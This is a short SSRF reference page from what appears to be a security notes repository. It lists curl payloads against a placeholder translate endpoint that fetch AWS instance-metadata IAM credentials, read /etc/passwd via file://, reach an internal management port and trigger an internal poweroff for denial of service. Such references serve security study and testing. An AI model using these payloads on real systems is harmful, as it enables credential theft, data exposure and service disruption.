Skip to content

Files

Latest commit

isacayaisacaya
Refactor Denial of Service section and enhance SSRF examples; add Inf…
Jan 4, 2025
16b9162 · Jan 4, 2025

History

History
32 lines (23 loc) · 857 Bytes

SSRF.md

File metadata and controls

32 lines (23 loc) · 857 Bytes

SSRF

Table of Contents

Access Control Bypass

Access controls implemented in the service can be bypassed, leading to data leakage.

  • Retrieve security credentials from instance metadata 1

    curl https://[VULNERABLE-SERVICE]/translate?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

  • Read arbitrary files from the file system

    curl https://[VULNERABLE-SERVICE]/translate?url=file:///etc/passwd

  • Access to the internal network

    curl https://[VULNERABLE-SERVICE]/translate?url=http://127.0.0.1:8888/management

It is possible to interact with internal services

  • DOS 
    curl https://[VULNERABLE-SERVICE]/translate?url=http://127.0.0.1:8888/poweroff

Footnotes

  1. Based on IMDSv1 (AWS)